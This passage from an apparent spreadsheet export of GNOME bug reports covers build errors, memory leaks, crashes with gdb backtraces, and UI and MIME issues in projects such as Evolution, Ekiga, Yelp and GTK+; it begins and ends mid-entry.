if gcc -DHAVE_CONFIG_H -I. -I. -I.. -I. -I.. -I../common -DAUTHDIR=\/opt/gnome2/var/gdm\ -DBINDIR=\/opt/gnome2/bin\ -DDATADIR=\/opt/gnome2/share\ -DDMCONFDIR=\/opt/gnome2/etc/dm\ -DGDMCONFDIR=\/opt/gnome2/etc/gdm\ -DGDMLOCALEDIR=\/opt/gnome2/etc/gdm\ -DLIBDIR=\/opt/gnome2/lib64\ -DLIBEXECDIR=\/opt/gnome2/libexec\ -DLOGDIR=\/var/log/gdm\ -DPIXMAPDIR=\/opt/gnome2/share/pixmaps\ -DSBINDIR=\/opt/gnome2/sbin\ -DGNOMELOCALEDIR=\/opt/gnome2/share/locale\ -DGDM_DEFAULTS_CONF=\/opt/gnome2/share/gdm/defaults.conf\ -DGDM_CUSTOM_CONF=\/opt/gnome2/etc/gdm/custom.conf\ -DGDM_OLD_CONF=\/opt/gnome2/etc/gdm/gdm.conf\ -DPNG_NO_MMX_CODE -I/opt/gnome2/include/gtk-2.0 -I/opt/gnome2/lib64/gtk-2.0/include -I/opt/gnome2/include/atk-1.0 -I/opt/gnome2/include/cairo -I/opt/gnome2/include/pango-1.0 -I/opt/gnome2/include/glib-2.0 -I/opt/gnome2/lib64/glib-2.0/include -I/opt/gnome2/include -I/opt/gnome2/include/libglade-2.0 -I/opt/gnome2/include/libxml2 -I/usr/include/freetype2 -I/usr/include/libpng12   -DPNG_NO_MMX_CODE -I/opt/gnome2/include/gtk-2.0 -I/opt/gnome2/lib64/gtk-2.0/include -I/opt/gnome2/include/atk-1.0 -I/opt/gnome2/include/cairo -I/opt/gnome2/include/pango-1.0 -I/opt/gnome2/include/glib-2.0 -I/opt/gnome2/lib64/glib-2.0/include -I/opt/gnome2/include -I/usr/include/freetype2 -I/usr/include/libpng12   -DLANG_CONFIG_FILE=\/opt/gnome2/etc/sysconfig/i18n\  -DGREETERTHEMEDIR=\/opt/gnome2/share/gdm/themes\  -I/opt/gnome2/include/dbus-1.0 -I/opt/gnome2/lib64/dbus-1.0/include -I/opt/gnome2/include/glib-2.0 -I/opt/gnome2/lib64/glib-2.0/include      -Wall         -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes         -Wnested-externs -Wpointer-arith         -Wcast-align -Wsign-compare         -g -O2 -Wall -Wmissing-prototypes  -Wno-strict-aliasing -Wno-sign-compare -MT slave.o -MD -MP -MF .deps/slave.Tpo -c -o slave.o slave.c \
        then mv -f .deps/slave.Tpo .deps/slave.Po else rm -f .deps/slave.Tpo exit 1 fi
slave.c:4067: warning: no previous prototype for 'gdm_slave_parse_enriched_string'
slave.c: In function 'gdm_slave_update_pseudo_device':
slave.c:4124: error: 'MAXPATHLEN' undeclared (first use in this function)
slave.c:4124: error: (Each undeclared identifier is reported only once
slave.c:4124: error: for each function it appears in.)
slave.c:4124: warning: unused variable 'buf'
slave.c:4108: warning: unused variable 'pseudo_device'
slave.c: In function 'gdm_slave_write_utmp_wtmp_record':
slave.c:4238: warning: field precision should have type 'int' but argument 4 has type 'long unsigned int'
slave.c:4259: warning: field precision should have type 'int' but argument 4 has type 'long unsigned int'
slave.c:4271: warning: field precision should have type 'int' but argument 4 has type 'long unsigned int'
slave.c:4288: warning: field precision should have type 'int' but argument 4 has type 'long unsigned int'
make[2]: *** [slave.o] Error 1</t>
  </si>
  <si>
    <t>GNOME-VFS-355468</t>
  </si>
  <si>
    <t>Module: ssh/sftp</t>
  </si>
  <si>
    <t>memory leak in sftp_get_connection ()</t>
  </si>
  <si>
    <t>In sftp_get_connection () 'hash_name' could eventually leak. Running valgrind in EOG spotted this.</t>
  </si>
  <si>
    <t>RHYTHMBOX-755881</t>
  </si>
  <si>
    <t>Segmentation fault (core dumped)</t>
  </si>
  <si>
    <t>Rhythmbox crashes immediately on startup</t>
  </si>
  <si>
    <t>eamonncostello</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-160684</t>
  </si>
  <si>
    <t>iagno</t>
  </si>
  <si>
    <t>iagno fails when configured theme is not found</t>
  </si>
  <si>
    <t>When upgrading gnome-games from version 2.6 to 2.8 if the user has configured a
theme which was removed in version 2.8 and moved to gnome-games-extra-data
iagno fails to start. Attaching a patch to fallback to the default theme.</t>
  </si>
  <si>
    <t>GTK+-390514</t>
  </si>
  <si>
    <t>GtkTextView beeps not only when something failed</t>
  </si>
  <si>
    <t>gtk_text_view_key_press_event() does in the end:
  if (!retval &amp;&amp; event-&gt;length)
    gtk_widget_error_bell (widget)
For instance it beeps when Ctrl-Alt-Foo is pressed. For some reason event-&gt;length is not zero (perhaps it has that Foo translated somehow) and textview says beep. It must not say beep unless it is really sure event belongs to it and it must die or handle it. Otherwise it should just return FALSE to indicate it didn't handle the event.</t>
  </si>
  <si>
    <t>GSTREAMER-140594</t>
  </si>
  <si>
    <t>Small memory leak int gst_parse_launch()</t>
  </si>
  <si>
    <t>The _gst_parse_yy_scan_string() function doesn't return an int but a buffer that
must be freed.</t>
  </si>
  <si>
    <t>sebas642</t>
  </si>
  <si>
    <t>EVOLUTION-599895</t>
  </si>
  <si>
    <t>Outbox doesn't get flushed when sending mail after closing evolution mail window</t>
  </si>
  <si>
    <t>Evolution 2.29.1 
1. Open a new composer window 
2. Close evolution mail window but process will be running 
3. Composer window will still be there 
4. Send a mail
5. Now evolution process will be killed 
6. Restart evolution 
7. Sent mail will still be there in Outbox 
8. Mail will be sent again on doing refresh 
Expected result : It shouldn't send mail twice.</t>
  </si>
  <si>
    <t>EKIGA-120849</t>
  </si>
  <si>
    <t>Gnomemeeting crashes when connecting to a Radvision ECS</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnomemeeting
Severity: blocker
Version: 0.96.0
Synopsis: Gnomemeeting crashes when connecting to a Radvision ECS
Bugzilla-Product: gnomemeeting
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
As soon as Gnomemeeting tries to register on the Gatekeeper (Radvision
ECS) Gnomemeeting dies.
Steps to reproduce the problem:
1. Configure the Gatekeeper
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Everytime Gnomemeeting is started
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/gnomemeeting'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ew Thread 1099912704 (LWP 2873)]
[New Thread 1167306032 (LWP 2888)]
[New Thread 1158913328 (LWP 2887)]
[New Thread 1150520624 (LWP 2886)]
[New Thread 1142127920 (LWP 2885)]
[New Thread 1133735216 (LWP 2882)]
[New Thread 1125342512 (LWP 2881)]
[New Thread 1116949808 (LWP 2880)]
(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0xffffe002
in ?? ()
#0  0xffffe002 in ?? ()
#1  0x0808219c in IdleUpdate(void*) ()
#2  0x40830743 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#3  0x4082db35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#4  0x4082eb78 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#5  0x4082ee8d in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#6  0x4082f58f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#7  0x403fef5f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#8  0x0808482f in main ()
#9  0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
Thread 8 (Thread 1116949808 (LWP 2880)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x41000ef8 in H323ConnectionsCleaner::Main() () from
/usr/lib/libopenh323.so.1
No symbol table info available.
#2  0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#3  0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 7 (Thread 1125342512 (LWP 2881)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x080887a0 in GMILSClient::Main() ()
No symbol table info available.
#2  0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#3  0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 1133735216 (LWP 2882)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x08079455 in GMVideoGrabber::Main() ()
No symbol table info available.
#2  0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#3  0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 1142127920 (LWP 2885)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x400fdfa7 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x4146e61a in PIPCacheData::PIPCacheData(hostent* char const*) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#4  0x4146f513 in PHostByAddr::GetHost(PIPSocket::Address const&amp;) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#5  0x4146f13f in PHostByAddr::GetHostName(PIPSocket::Address const&amp;
PString&amp;) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#6  0x41471ac0 in PIPSocket::GetHostName(PIPSocket::Address const&amp;) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#7  0x4105fa9b in H323Gatekeeper::PrintOn(std::ostream&amp;) const ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#8  0x4105fbf9 in H323Gatekeeper::GetName() const () from
/usr/lib/libopenh323.so.1
No symbol table info available.
#9  0x08087f21 in GMH323Gatekeeper::Main() ()
No symbol table info available.
#10 0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#11 0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 1150520624 (LWP 2886)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4149e557 in PChannel::PXSetIOBlock(PChannel::PXBlockType
PTimeInterval const&amp;) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#2  0x4147836f in PSocket::os_accept(PSocket&amp; sockaddr* int*) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#3  0x4147427d in PTCPSocket::Accept(PSocket&amp;) () from
/usr/lib/libpt.so.1
No symbol table info available.
#4  0x41046657 in H323ListenerTCP::Accept(PTimeInterval const&amp;) ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#5  0x410473f6 in H323ListenerTCP::Main() () from
/usr/lib/libopenh323.so.1
No symbol table info available.
#6  0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#7  0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1158913328 (LWP 2887)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x41067c5b in H323Gatekeeper::MonitorMain(PThread&amp; int) ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#2  0x41069408 in H323Gatekeeper::MonitorMain_PNotifier::Call(PObject&amp;
int) const ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#3  0x414a5be7 in PNotifier::operator()(PObject&amp; int) const () from
/usr/lib/libpt.so.1
No symbol table info available.
#4  0x414b92d0 in PSimpleThread::Main() () from /usr/lib/libpt.so.1
No symbol table info available.
#5  0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#6  0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 1167306032 (LWP 2888)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x4149e557 in PChannel::PXSetIOBlock(PChannel::PXBlockType
PTimeInterval const&amp;) ()
   from /usr/lib/libpt.so.1
No symbol table info available.
#2  0x41478cdb in PSocket::os_recvfrom(void* int int sockaddr* int*)
()
   from /usr/lib/libpt.so.1
No symbol table info available.
#3  0x414744d4 in PIPDatagramSocket::ReadFrom(void* int
PIPSocket::Address&amp; unsigned short&amp;) () from /usr/lib/libpt.so.1
No symbol table info available.
#4  0x414750e1 in PUDPSocket::Read(void* int) () from
/usr/lib/libpt.so.1
No symbol table info available.
#5  0x4149d18e in PIndirectChannel::Read(void* int) () from
/usr/lib/libpt.so.1
No symbol table info available.
#6  0x4104a29e in H323TransportUDP::ReadPDU(PBYTEArray&amp;) ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#7  0x4101893c in H323RasPDU::Read(H323Transport&amp;) () from
/usr/lib/libopenh323.so.1
No symbol table info available.
#8  0x4109e193 in H225_RAS::HandleRasChannel(PThread&amp; int) ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#9  0x410a46d8 in H225_RAS::HandleRasChannel_PNotifier::Call(PObject&amp;
int) const ()
   from /usr/lib/libopenh323.so.1
No symbol table info available.
#10 0x414a5be7 in PNotifier::operator()(PObject&amp; int) const () from
/usr/lib/libpt.so.1
No symbol table info available.
#11 0x414b92d0 in PSimpleThread::Main() () from /usr/lib/libpt.so.1
No symbol table info available.
#12 0x414c08ee in PThread::PX_ThreadStart(void*) () from
/usr/lib/libpt.so.1
No symbol table info available.
#13 0x4155a332 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1099912704 (LWP 2873)):
#0  0xffffe002 in ?? ()
No symbol table info available.
#1  0x0808219c in IdleUpdate(void*) ()
No symbol table info available.
#2  0x40830743 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x4082db35 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x4082eb78 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x4082ee8d in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x4082f58f in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x403fef5f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#8  0x0808482f in main ()
No symbol table info available.
#9  0x420156a4 in __libc_start_main () from /lib/tls/libc.so.6
No symbol table info available.
#0  0xffffe002 in ?? ()
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-08-27 12:26 -------
The original reporter (andre.prakash@recos.ch) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnomemeeting-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>andre.prakash</t>
  </si>
  <si>
    <t>FILE-ROLLER-125844</t>
  </si>
  <si>
    <t>MIME information should differenciate between .zip and .jar</t>
  </si>
  <si>
    <t xml:space="preserve">Package: file-roller
Severity: normal
Version: 2.4.1
Synopsis: MIME information should differenciate between .zip and .jar
Bugzilla-Product: file-roller
Bugzilla-Component: general
Description:
Description of Problem:
in $PREFIX/mime-info/file-roller.mime I read
application/zip
        ext: zip jar ear war
Consequently if file roller is installed Nautilus indiscriminately
regards jar files as normal zip files.  
Hence it is impossible to seperately customize what I want to happen if
I click on a jar file.
This is wrong. jar archives should be application/x-java-archive not
application/zip. (The global GNOME mime information has got that right
but file-roller's mime info overrides that.)
When I click a zip file I certainly expect file-roller to be launched
but for jar files I want that to be only an option the first choice
being that the jar file is launched with java -jar $FILE
Therefore I highly recommend to move the extension jar from
application/zip and to application/x-java-archive.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-10-30 11:23 -------
Reassigning to the default owner of the component paolo.bacch@tin.it.
</t>
  </si>
  <si>
    <t>EVOLUTION-271870</t>
  </si>
  <si>
    <t>Both Mail and Composer Preferences have the same options in Evolution Settings.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Both Mail and Composer Preferences have the same options in Evolution Settings.
Option is 
Fall back to threading messages by subject.
Generates a D-BUS message when new mail arrives
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen? 
evolution 2.1.4. 
Additional Information:</t>
  </si>
  <si>
    <t>EVOLUTION-304709</t>
  </si>
  <si>
    <t>task edit window does not let me save saying Validation Error: Completed date is wrong</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: Evolution
Severity: normal
Version: GNOME2.10.0 unspecified
Gnome-Distributor: Ubuntu
Synopsis: task edit window does not let me save saying Validation Error: Completed date is wrong
Bugzilla-Product: Evolution
Bugzilla-Component: Tasks
Bugzilla-Version: unspecified
Description:
Description of Problem:
When generating a new task or editing a task using the task editor the
editor won't let me
save the task saying Validation Error: Completed date is wrong.
The only way to save it is to enter a past date in the completed date
field (which of course does not help
as the task is usually yet to be completed).
Steps to reproduce the problem:
1. double click on a task to edit it (in the task mode of evolution) or
click on the NEW button.
2. Modify the talks
3. Press the OK button
Actual Results:
Error dialog opens sayin Validation Error: Completed date is wrong
Expected Results:
Task should be saved and Task Editor window should close.
How often does this happen?
Almost considently (in some rare cases it works but most often it does
not.
Unfortunately I was not able to reproduce the circumstances when it
works
as that occurs rather seldom).
Additional Information:
Ubuntu Hoary
Evolution 2.2.2-0ubuntu2
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-05-18 22:26 UTC -------
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was jca@zurich.ibm.com.
</t>
  </si>
  <si>
    <t>jca</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-348275</t>
  </si>
  <si>
    <t>gnome-games needs to update .desktop files for new bug-buddy</t>
  </si>
  <si>
    <t>Bug-buddy has changed its behavior in 2.15 and now requires special .desktop file considerations. I am still waiting for specifics and will post them here when I get them.</t>
  </si>
  <si>
    <t>YELP-475346</t>
  </si>
  <si>
    <t>crash in Help: help crashed by about fe...</t>
  </si>
  <si>
    <t>Version: 2.19.90
What were you doing when the application crashed?
help crashed by about fedora
Distribution: Fedora release 7.91 (Rawhide)
Gnome Release: 2.19.5 2007-07-08 (Red Hat Inc)
BugBuddy Version: 2.19.91
System: Linux 2.6.23-0.61.rc1.git9.fc8 #1 SMP Tue Jul 31 17:14:25 EDT 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: Enforcing
Accessibility: Enabled
GTK+ Theme: Clearlooks
Icon Theme: Fedora
Memory status: size: 617648128 vsize: 617648128 resident: 52322304 share: 29691904 rss: 52322304 rss_rlim: 18446744073709551615
CPU usage: start_time: 1189432594 rtime: 101 utime: 63 stime: 38 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/yelp'
(no debugging symbols found)
Using host libthread_db library /lib64/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 46912580437200 (LWP 4752)]
[New Thread 1105209680 (LWP 4755)]
[New Thread 1094719824 (LWP 4754)]
[New Thread 1084229968 (LWP 4753)]
(no debugging symbols found)
0x00002aaaad9a6d06 in poll () from /lib64/libc.so.6
#0  0x00002aaaad9a6d06 in poll () from /lib64/libc.so.6
#1  0x000000320443205e in __cxa_pure_virtual () from /lib64/libglib-2.0.so.0
#2  0x000000320443251a in g_main_loop_run () from /lib64/libglib-2.0.so.0
#3  0x00002aaaaae21d43 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
#4  0x00000000004186ec in __cxa_pure_virtual ()
#5  0x00002aaaad8fbd34 in __libc_start_main () from /lib64/libc.so.6
#6  0x000000000040d159 in __cxa_pure_virtual ()
#7  0x00007fff6767e228 in ?? ()
#8  0x0000000000000000 in ?? ()
Thread 4 (Thread 1084229968 (LWP 4753)):
#0  0x00002aaaad9a6d06 in poll () from /lib64/libc.so.6
No symbol table info available.
#1  0x0000003216e23a84 in PR_Poll () from /usr/lib64/libnspr4.so
No symbol table info available.
#2  0x00002aaab4ae833a in __cxa_pure_virtual ()
   from /usr/lib64/firefox-2.0.0.6/components/libnecko.so
No symbol table info available.
#3  0x00002aaab4ae851a in __cxa_pure_virtual ()
   from /usr/lib64/firefox-2.0.0.6/components/libnecko.so
No symbol table info available.
#4  0x00002aaaadca7773 in __cxa_pure_virtual ()
   from /usr/lib64/firefox-2.0.0.6/libxpcom_core.so
No symbol table info available.
#5  0x0000003216e277bd in __cxa_pure_virtual () from /usr/lib64/libnspr4.so
No symbol table info available.
#6  0x00002aaaacd32447 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#7  0x00002aaaad9afabd in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 3 (Thread 1094719824 (LWP 4754)):
#0  0x00002aaaacd36bbd in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003216e21539 in __cxa_pure_virtual () from /usr/lib64/libnspr4.so
No symbol table info available.
#2  0x0000003216e22159 in PR_WaitCondVar () from /usr/lib64/libnspr4.so
No symbol table info available.
#3  0x00002aaaadca9185 in __cxa_pure_virtual ()
   from /usr/lib64/firefox-2.0.0.6/libxpcom_core.so
No symbol table info available.
#4  0x00002aaaadca7773 in __cxa_pure_virtual ()
   from /usr/lib64/firefox-2.0.0.6/libxpcom_core.so
No symbol table info available.
#5  0x0000003216e277bd in __cxa_pure_virtual () from /usr/lib64/libnspr4.so
No symbol table info available.
#6  0x00002aaaacd32447 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#7  0x00002aaaad9afabd in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 2 (Thread 1105209680 (LWP 4755)):
#0  0x00002aaaacd3a0ff in waitpid () from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003215a575b9 in __cxa_pure_virtual ()
   from /usr/lib64/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x00002aaaacd34383 in pthread_mutex_lock () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000000000419fda in __cxa_pure_virtual ()
No symbol table info available.
#5  0x000000000041a6c9 in __cxa_pure_virtual ()
No symbol table info available.
#6  0x000000000041f81c in __cxa_pure_virtual ()
No symbol table info available.
#7  0x0000003204450a14 in __cxa_pure_virtual () from /lib64/libglib-2.0.so.0
No symbol table info available.
#8  0x00002aaaacd32447 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#9  0x00002aaaad9afabd in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 1 (Thread 46912580437200 (LWP 4752)):
#0  0x00002aaaad9a6d06 in poll () from /lib64/libc.so.6
No symbol table info available.
#1  0x000000320443205e in __cxa_pure_virtual () from /lib64/libglib-2.0.so.0
No symbol table info available.
#2  0x000000320443251a in g_main_loop_run () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x00002aaaaae21d43 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#4  0x00000000004186ec in __cxa_pure_virtual ()
No symbol table info available.
#5  0x00002aaaad8fbd34 in __libc_start_main () from /lib64/libc.so.6
No symbol table info available.
#6  0x000000000040d159 in __cxa_pure_virtual ()
No symbol table info available.
#7  0x00007fff6767e228 in ?? ()
No symbol table info available.
#8  0x0000000000000000 in ?? ()
No symbol table info available.
#0  0x00002aaaad9a6d06 in poll () from /lib64/libc.so.6
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors ---------------------
** (gdmsetup:4722): DEBUG: Sending command: 'UPDATE_CONFIG greeter/GlobalFaceDir=/usr/share/pixmaps/faces/'
** (gdmsetup:4722): DEBUG:   Got response: 'OK'
** (gdmsetup:4722): DEBUG: Sending command: 'CLOSE'
** (gdmsetup:4722): DEBUG: Sending command: 'VERSION'
** (gdmsetup:4722): DEBUG:   Got response: 'GDM 2.19.5'
** (gdmsetup:4722): DEBUG: Sending command: 'GET_CONFIG greeter/Logo :0.0'
** (gdmsetup:4722): DEBUG:   Got response: 'OK '
** (gdmsetup:4722): DEBUG: Sending command: 'CLOSE'
(yelp:4752): Yelp-WARNING **: YelpDocument: Attempted to add an ID mapping from x-yelp-index to x-yelp-index but x-yelp-index is already mapped.
I/O warning : failed to load external entity /usr/share/xml/gnome/xslt/docbook/html/db2xhtml.xsl
compilation error: file /usr/share/yelp/xslt/db2html.xsl line 8 element import
xsl:import : unable to load /usr/share/xml/gnome/xslt/docbook/html/db2xhtml.xsl
warning: no loadable sections found in added symbol-file system-supplied DSO at 0x7fff67704000
--------------------------------------------------</t>
  </si>
  <si>
    <t>kazuaki_okuyama</t>
  </si>
  <si>
    <t>GTK+-172633</t>
  </si>
  <si>
    <t>[obsolete] stock-icons</t>
  </si>
  <si>
    <t>Gtk+ needs stock icons update</t>
  </si>
  <si>
    <t>Problem: Some stock icons [1] are really dated probably they are the last
survivors from 1.X releases. They don't fit the look of the other elegant stock
icons made for the 2.X series. 
Icons that needs update: 
stock_apply_20.png
stock_cancel_20.png
stock_no_20.png
stock_ok_20.png
Those can be found in $LAST_GTK_VERSION/gtk/stock-icons
Proposed solution: Use the stock icons that Jakub Steiner did for the Industrial
gtk theme. Since mr. Steiner did (most of) the current default stock icons and
his work with the industrial icon theme fits really well inside the default
artwork this would be the most obvious solution. The list of icons (extracted
directly from the gtk theme):
stock_apply-16.png (can be used for stock_yes-16.png)
stock_down-16.png   
stock_left-16.png     
stock_top-16.png
stock_bottom-16.png  
stock_first-16.png  
stock_refresh-16.png 
stock_up-16.png
stock_cancel-16.png  (can be used for stock_no-16.png)
stock_last-16.png   
stock_right-16.png
stock_right.png
stock_apply.png  (can be used for stock_yes.png)    
stock_down.png      
stock_left.png        
stock_ok.png          
stock_top.png
stock_bottom.png     
stock_first.png     
stock_refresh.png     
stock_up.png
stock_cancel.png (can be used for stock_no.png)    
stock_last.png      
rename them as appropriate and replace the old icons. 
Known problems:
- It seems that the most problematic icons (stock_apply_20.png
stock_cancel_20.png stock_no_20.png stock_ok_20.png) are 20x20 px. I'm not
sure why they are there with such an unusual size (usually they are 16x16 px or
24x24 px). Since the stock icons that mr. Steiner did for Industrial are 24x24
px they cannot be used directly instead of those ones. Resizing them would be a
poor solution so I'm wondering if we can use 24x24 px images instead of 20x20.
I've baked my own solution (renamed all the stuff and added the icons) but I'm
not sure if this would be appropriate so I'm not sending it attached. If you
need further explanation/help I'll be glad in doing so. 
[1] gtk-apply gtk-cancel gtk-yes and gtk-no are the most notable examples
since they're used in many dialogs.
Other information:
Important note: I've filed a bug against gnome-icon-theme to add this stock
icons. However fixing the stock icons on gnome-icon-theme would just work for
gnome while fixing this on gtk upstream can benefit all apps build with gtk in
linux windows and other platforms. Those little details can improve the
experience of the users.</t>
  </si>
  <si>
    <t>lookkas</t>
  </si>
  <si>
    <t>GNOME-APPLETS-6296</t>
  </si>
  <si>
    <t>geyes</t>
  </si>
  <si>
    <t>geyes applet in 1.1.3</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Version 1.1.3
gnome eyes applet is apparently missing something: when trying to run
it I get:
 /usr/bin/geyes_applet
** ERROR **: Unable to open theme file.
aborting...
Aborted
--------
System: RH 6.1 mostly october gnome + gnome-core gnome-applets 1.1.3
Sasha
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:54 -------
This bug was previously known as bug 6296 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=6296
Originally filed under the gnome-applets product and general component.
The original reporter (kirillov@math.sunysb.edu) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>kirillov</t>
  </si>
  <si>
    <t>GNOPERNICUS-149969</t>
  </si>
  <si>
    <t>'object:text-caret-moved' event should not be reported if one of the details is -1</t>
  </si>
  <si>
    <t>1. Start Gnopernicus
2. Start StarOffice Writer
3. Typed some text
4. Use Up/Down arrow keys to navigate between text lines (paragraphs)
5. When focus moves between two paragraphs there are three events which are
received by gnopernicus:
   - an 'object:text-caret-moved' event for the old paragraph with details (-1
)
   - a 'focus:' event for the new paragraph
   - an 'object:text-caret-moved' event for the new paragraph with details
( -1).
Sometimes speech outputs two presentation ('caret-moved' for the old paragraph
and 'focus:' for the new one) which is not correct.
The simplest way to avoid this redundant output in gnopernicus is to reject
'object:text-caret-moved' events if one of the details is -1.</t>
  </si>
  <si>
    <t>do</t>
  </si>
  <si>
    <t>EVOLUTION-256519</t>
  </si>
  <si>
    <t>crash while importing settings from Evo 1.4.6</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: GNOME2.2.2 1.5.5
os_details: Ximian Inc.
Synopsis: crash while importing settings from Evo 1.4.6
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
BugBuddy-GnomeVersion: 2.0 (2.2.2)
Description:
Description of Problem:
crash while importing settings from Evo 1.4.6
Steps to reproduce the problem:
1. install 1.5
2. run evolution-1.5 --force-migration
Actual Results:
Some folders are migrated...  Then crash.
Expected Results:
Migration happens without flaw.
How often does this happen?
So far just once but probably every time.
Additional Information:
i | Evolution Dev Snaps | evolution1.5       | 2004-04-02 15:55
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.5'
[New Thread 1094491680 (LWP 12243)]
0xffffe002 in ?? ()
#0  0xffffe002 in ?? ()
#1  0x4046cfb1 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  0x0806659c in segv_redirect (sig=11) at main.c:456
#3  
#4  0x40c01c18 in gtk_progress_bar_set_fraction ()
   from /usr/lib/libgtk-x11-2.0.so.0
#5  0x41667b53 in em_migrate_set_folder_name (
    folder_name=0x813e300
/home/xkahn/evolution/mail/imap/xkahn@peabody.ximian.com/folders/INBOX/2255.)
at em-migrate.c:1116
#6  0x4166851a in cp_r (
    src=0x80aa550
